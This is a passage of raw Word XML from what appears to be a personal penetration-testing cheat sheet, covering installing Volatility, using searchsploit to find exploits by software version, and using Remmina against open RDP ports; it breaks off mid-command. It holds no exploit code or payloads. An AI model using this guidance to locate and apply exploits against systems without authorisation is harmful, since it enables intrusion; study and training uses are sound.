              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="2A64840D" w14:textId="77777777" w:rsidR="00156E85" w:rsidRDefault="00156E85" w:rsidP="000743C5">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="6" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6D2AAEE0" w14:textId="77777777" w:rsidR="00156E85" w:rsidRDefault="00156E85" w:rsidP="000743C5"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="01383ADD" w14:textId="27A0FC99" w:rsidR="00C364A5" w:rsidRDefault="004A583D">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E08A66C" w14:textId="23B4884C" w:rsidR="00C364A5" w:rsidRDefault="00C364A5" w:rsidP="00C364A5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Install and Use Volatility</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1067"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="499"/>
        <w:gridCol w:w="2415"/>
        <w:gridCol w:w="8113"/>
      </w:tblGrid>
      <w:tr w:rsidR="00834B5C" w14:paraId="1C0E7342" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="46B79962" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C840F75" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>volatility</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r w:rsidRPr="00B571A0">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>Currently, I am unable to get this method to work on my VM Kali</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4151C097" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>1.) To install on Windows, navigate to the Volatility Foundation website and find the latest release versions for Windows and download and uncompress.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>2.) Open a cmd prompt and change directory to where the ‘standalone’ folder is. You can drag and drop the file from file explorer onto the cmd and it paste in the path.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="78562676" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>3.) Run the .exe file and you will see you need a switch/plug-in to do something with it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="5F138DDB" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71685E26" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4BF0DA54" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="71F4B289" w14:textId="4C26A220" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>1.) To install on Kali, navigate to the Volatility Foundation website and find the latest release versions for Linux- right click the file link and click ‘Copy Link Location’.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>2.) In terminal, as root, use wget command:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>wget ‘</w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>ht</w:t>
            </w:r>
            <w:r w:rsidR="00C532C3">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>p://PASTEINURLADDRESS.zip</w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>’</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="537232CC" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t xml:space="preserve">3.) Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">ls </w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve">command to see the .zip file. Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve">unzip </w:t>
            </w:r>
            <w:r w:rsidRPr="00353845">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>FILENAME.zip</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="54ABA33B" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0C35EAEB" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0B82037B" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="15CC2B73" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="072B2816" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57A20113" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.d</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7D100C4B" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="6BB483A4" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="6A76BAE5" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1DAD9110" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.e</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="26A2C7B7" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4DD47419" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="51D0C868" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="67ECDEE5" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:r>
              <w:t>.f</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="052FF320" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="1B8ED6BD" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00834B5C" w14:paraId="425E784E" w14:textId="77777777" w:rsidTr="0043739D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="499" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="51A51D04" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2415" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4656F71F" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRDefault="00834B5C" w:rsidP="0043739D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8113" w:type="dxa"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="115343D8" w14:textId="77777777" w:rsidR="00834B5C" w:rsidRPr="001E0F42" w:rsidRDefault="00834B5C" w:rsidP="0043739D"/>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="17964FC8" w14:textId="2A868C3E" w:rsidR="00F15476" w:rsidRDefault="00F15476"/>
    <w:p w14:paraId="26153603" w14:textId="77777777" w:rsidR="00DC2A77" w:rsidRDefault="00DC2A77">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D76C8B6" w14:textId="389681A3" w:rsidR="007118F6" w:rsidRPr="00F15476" w:rsidRDefault="007118F6" w:rsidP="007118F6">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Specific Exploits and Escalation: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Searchsploit (Exploit-db.com CLI)</w:t>
      </w:r>
      <w:r w:rsidR="00297371">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> | Remmina</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="page" w:horzAnchor="margin" w:tblpY="1036"/>
        <w:tblW w:w="11027" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="611"/>
        <w:gridCol w:w="2394"/>
        <w:gridCol w:w="8022"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C54A9" w14:paraId="2841D84D" w14:textId="77777777" w:rsidTr="0006198D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="00FEDC7E" w14:textId="77777777" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t>71.a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4C5D7051" w14:textId="649B1C34" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>searchsploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="44F3CADB" w14:textId="193BE13C" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="004E79B2">
            <w:r>
              <w:t>We can use searchsploit to find exploits for a particular software version.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11F9FB97" w14:textId="77777777" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="004E79B2">
            <w:r>
              <w:t>Searchsploit is basically just a command line search tool for exploit-db.com.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37AAA327" w14:textId="2B1A12F7" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="004E79B2">
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="004E79B2">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>searchsploit</w:t>
            </w:r>
            <w:r w:rsidRPr="004E79B2">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t xml:space="preserve"> SEARCH TERM </w:t>
            </w:r>
            <w:r w:rsidRPr="004E79B2">
              <w:rPr>
                <w:color w:val="92D050"/>
              </w:rPr>
              <w:t>VERSION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C54A9" w14:paraId="307FE251" w14:textId="77777777" w:rsidTr="0082528C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1962480B" w14:textId="466A3EA8" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t>71.b</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="6A72812B" w14:textId="5DBBA778" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3A2187FC" w14:textId="05D849C7" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t>This will then give you the module paths with the known vulnerabilities in a table format along with the exploit title.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6FDBBD2D" w14:textId="3E10275A" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t xml:space="preserve">The module will be located first in the directory </w:t>
            </w:r>
            <w:r w:rsidRPr="008C54A9">
              <w:rPr>
                <w:color w:val="00B050"/>
              </w:rPr>
              <w:t>/usr/share/exploitdb/exploits/…</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C12E067" w14:textId="77777777" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t xml:space="preserve">From here you can find the appropriate file you need, alternatively use </w:t>
            </w:r>
            <w:r w:rsidRPr="008C54A9">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t>locate</w:t>
            </w:r>
            <w:r>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45D25125" w14:textId="18AAD937" w:rsidR="008C54A9" w:rsidRDefault="008C54A9" w:rsidP="0006198D">
            <w:r>
              <w:t>Finding and reading the file will give a description of how to use the module and what it does to achieve the exploitation.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB1D85" w14:paraId="73731F1A" w14:textId="77777777" w:rsidTr="0082528C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="611" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="24" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="00FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="48339E61" w14:textId="4922716D" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t>71.c</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2394" w:type="dxa"/>
            <w:vMerge w:val="restart"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="12" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E1FFFF"/>
          </w:tcPr>
          <w:p w14:paraId="62E3CA02" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>remmina</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D7FA6B1" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7F4FCADF" w14:textId="0FF2C594" w:rsidR="00DB1D85" w:rsidRPr="00297371" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00297371">
              <w:rPr>
                <w:i/>
                <w:iCs/>
              </w:rPr>
              <w:t>(Use to exploit Remote Desktop Connection/RDP)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8022" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="12" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="24" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="030E6F5E" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRPr="009A1A1A" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:pPr>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t>IF THERE IS A REMOTE DESKTOP CONNECTION,</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> USUALLY ON MICROSOFT MACHINES WITH PORT 3389 OPEN,</w:t>
            </w:r>
            <w:r w:rsidRPr="00322D20">
              <w:rPr>
                <w:color w:val="7030A0"/>
              </w:rPr>
              <w:t xml:space="preserve"> USE REMMINA. OTHERWISE, SKIP.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5BD30CE3" w14:textId="77777777" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r>
              <w:t>Keep in mind that Remmina can also be used to connect via SSH and VNC.</w:t>
            </w:r>
            <w:r>
              <w:br/>
              <w:t>Ensure the package is installed first using:</w:t>
            </w:r>
            <w:r>
              <w:br/>
            </w:r>
            <w:r>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="00A5340E">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="00A5340E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:t xml:space="preserve"> apt </w:t>
            </w:r>
            <w:r w:rsidRPr="00A5340E">
              <w:rPr>
                <w:color w:val="00B0F0"/>
              </w:rPr>
              <w:t>update</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3326D2D6" w14:textId="4AA252F5" w:rsidR="00DB1D85" w:rsidRDefault="00DB1D85" w:rsidP="00297371">
            <w:r w:rsidRPr="00A5340E">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="003A1885">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:u w:val="single"/>
              </w:rPr>
              <w:t>sudo</w:t>
            </w:r>
            <w:r w:rsidRPr="003A1885">
              <w:rPr>
                <w:color w:val="FF0000"/>
              </w:rPr>
